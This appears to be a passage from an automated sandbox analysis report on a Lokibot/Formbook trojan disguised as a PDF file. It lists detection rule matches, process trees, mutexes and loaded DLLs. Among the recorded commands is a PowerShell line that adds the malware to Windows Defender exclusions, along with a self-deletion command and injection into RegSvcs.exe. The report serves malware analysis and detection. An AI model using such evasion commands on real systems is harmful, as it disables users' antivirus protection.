            Source: Process Memory Space: Ajanlatkeres_2024.05.29.PDF.exe PID: 2820, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: YLc7afPlL4RjCeK.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: RegSvcs.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: RegSvcs.exe PID: 7700, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: chkdsk.exe PID: 7864, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Ajanlatkeres_2024.05.29.PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: YLc7afPlL4RjCeK.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, jUedmmIQbjpaEiUIOJ.csSecurity API names: _0020.SetAccessControl
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, jUedmmIQbjpaEiUIOJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, jUedmmIQbjpaEiUIOJ.csSecurity API names: _0020.AddAccessRule
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, h2df4pn6d2N4C8egS2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, jUedmmIQbjpaEiUIOJ.csSecurity API names: _0020.SetAccessControl
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, jUedmmIQbjpaEiUIOJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, jUedmmIQbjpaEiUIOJ.csSecurity API names: _0020.AddAccessRule
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, BVvQkKGnivA0dbGJTm.csSecurity API names: _0020.SetAccessControl
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, BVvQkKGnivA0dbGJTm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, BVvQkKGnivA0dbGJTm.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, xFLBrsOc76AdDA34nm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, xFLBrsOc76AdDA34nm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ef3384.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 14.2.YLc7afPlL4RjCeK.exe.2fe337c.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ee336c.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 14.2.YLc7afPlL4RjCeK.exe.2fd3364.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.6fb0000.7.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/15@13/8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,15_2_0040650A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,15_2_0040434D
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ajanlatkeres_2024.05.29.PDF.exe.logJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeJump to behavior
            Source: Ajanlatkeres_2024.05.29.PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Ajanlatkeres_2024.05.29.PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Ajanlatkeres_2024.05.29.PDF.exeReversingLabs: Detection: 28%
            Source: Ajanlatkeres_2024.05.29.PDF.exeString found in binary or memory: -------------------------------------ADD Student Record-------------------------------------
            Source: unknownProcess created: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe" Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
